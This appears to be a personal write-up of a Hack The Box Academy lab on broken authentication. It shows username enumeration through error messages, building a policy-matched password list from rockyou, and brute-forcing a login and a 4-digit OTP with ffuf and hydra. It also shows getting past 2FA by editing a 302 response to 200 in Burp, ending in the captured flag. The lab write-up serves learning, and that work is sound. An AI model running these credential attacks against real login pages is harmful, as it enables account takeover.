BROKEN AUTHENTICATION

Completed Broken Authenticationacademy.hackthebox.com

OBJECTIVE: perform a black box security assessment of a client's web application.

Obtain the flag.

#manually walk the webapp & identify potential entry points
root@htb:~$ BROWSER > {targetSite:port}
 * identified registration portal
root@htb:~$ BROWSER > {targetSite:port}/register.php
 username: {arbitraryValue}
 password: {arbitraryValue}
 * submit expected input
 
 * identified password policy
    Password does not meet our password policy:
    Contains at least one digit
    Contains at least one lower-case character
    Contains at least one upper-case character
    Contains NO special characters
    Is exactly 12 characters long

#create a valid account for use in identifying valid usernames
root@htb:~$ BROWSER > {targetSite:port}
 * identified registration portal
root@htb:~$ BROWSER > {targetSite:port}/register.php
 username: null
 password: passw0rD1234
 * submit expected input
 
root@htb:~$ BROWSER > http://94.237.50.242:37952/profile.php
 username: null
 password: passw0rD1234
 * You do not have admin privileges. The site is still under construction and only available to admins at this time.

#identify error msgs for valid username
root@htb:~$ BROWSER > {targetSite:port}
 * identified registration portal
root@htb:~$ BROWSER > {targetSite:port}/register.php
 username: null
 password: {purposelyIncorrectPassword}
 * submit expected input
 
 * valid username but wrong password error msg: Invalid credentials.
 * invalid username but correct/wrong password error msg: Unknown username or password.
 
#generate tailored password
#tailor the password to the organization's password policy (if known)
 Password does not meet our password policy:
 Contains at least one digit
 Contains at least one lower-case character
 Contains at least one upper-case character
 Contains NO special characters
 Is exactly 12 characters long
 
root@htb:~$ locate rockyou.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz .
root@htb:~$ tar -xf rockyou.txt.tar.gz
root@htb:~$ wc -l rockyou.txt
 * 14344391 rockyou.txt

root@htb:~$ grep -E '^[[:alnum:]]{12}$' rockyou.txt | grep '[[:upper:]]' | grep '[[:lower:]]' | grep '[[:digit:]]' > customPWList.txt
 * the grep '[[:upper:]]' rockyou.txt searches for lines in rockyou.txt that contain at least one uppercase letter.
    - The [[:upper:]] is a POSIX character class that matches any uppercase letter (A-Z).
 * the grep '[[:lower:]]' filters the lines to include only those containing at least one lowercase letter (matched by [[:lower:]]).
 * the grep '[[:digit:]]' filters the output further to include only lines that contain at least one digit (0-9).
    - the [[:digit:]] POSIX character class matches any numeric digit.
 * the grep -E '.{10}' uses the -E option (extended regular expressions) to match lines with 12 or more characters.
    - the pattern .{12} matches any line with at least 12 characters, where . represents any character and {12} specifies at least 12 repetitions.
 * the [[:alnum:]]: matches any alphanumeric character (letter or digit).
root@htb:~$ wc -l customPWList.txt
 * 17048 customPWList.tx

#identify parameters, pages, & other pertinent info
BURP > Proxy
 Request
 ...
  POST /login.php HTTP/1.1
  Host: 94.237.54.42:52406
  Origin: http://94.237.54.42:52406
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.54.42:52406/login.php
  Cookie: PHPSESSID=4o5c25afhbmnr34dqbbeutsv8i
  Connection: close

  username=test&password=test

#automate user enumeration
root@htb:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt

root@htb:~$ ffuf -w xato-net-10-million-usernames.txt:FUZZ -u http://94.237.61.84:32739/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalidInput" -fr "Unknown username or password." -o userEnum.txt
 NULL   [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 139ms]
 gladys [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 101ms]
 null   [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 139ms]
 Gladys [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 101ms]
 
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded fro

#brute force the identified user's password using tailored password based on policy
root@htb:~$ ffuf -w ./customPWList.txt:FUZZ -u http://94.237.61.84:32739/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=gladys&password=FUZZ" -mc 302
 * dWinaldasD13 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
 * ALT: hydra -l gladys -P customPWList.txt 94.237.61.84 -s 32739 -f http-post-form "/:username=gladys&password=^PASS^:Invalid credentials."

BURP > {targetSite:port}
 OTP: 12345
 
 POST /2fa.php HTTP/1.1
 Host: 94.237.61.84:32739
 Origin: http://94.237.61.84:32739
 Referer: http://94.237.61.84:32739/login.php
 Cookie: PHPSESSID=03kue8sbiklfqjpv8r1s9v9bpc
 Content-Type: application/x-www-form-urlencoded

 otp=test
 
 * submit test input to identify invalid msg
    - Invalid OTP.

#generate tokens
#some target will provide the necessary information regarding OTP. e.g., Welcome admin. Please provide your 4-digit One-Time Password (OTP).
root@oco:~$ seq -w 0 9999 > tokens.txt
 * The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat tokens.txt
 0000
 ...
 9999

root@oco:~$ ffuf -w tokens.txt -u http://94.237.61.84:32739/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=03kue8sbiklfqjpv8r1s9v9bpc" -d "otp=FUZZ" -fr "Invalid OTP." -t 120
 * no result

#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Browser > http://94.237.50.242:37952/login.php
 username: gladys
 password: dWinaldasD13
 * submit expected input

BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
 Request
  ...
  GET /profile.php HTTP/1.1                       //change 2fa.php to /profile.php
  Host: 94.237.62.184:39910
  Cookie: PHPSESSID=0cjtbh0mg9h0vdu4bmal7gib6s
  Connection: close

BURP > Proxy > Response > Forward
 Response
  ...
  HTTP/1.1 302 Found                      // change this to 200 OK
  Date: Wed, 25 Dec 2024 19:13:30 GMT
  Server: Apache/2.4.59 (Debian)
  Location: index.php
  Connection: close
  
  Modifications...
  HTTP/1.1 200 OK
  
root@oco:~$ BROWSER > http://94.237.62.184:39910/profile.php
 * HTB{d86115e037388d0fa29280b737fd9171}

PreviousLOGIN BRUTE FORCING 1 & 2 NextWEB ATTACKS

Last updated 11 months ago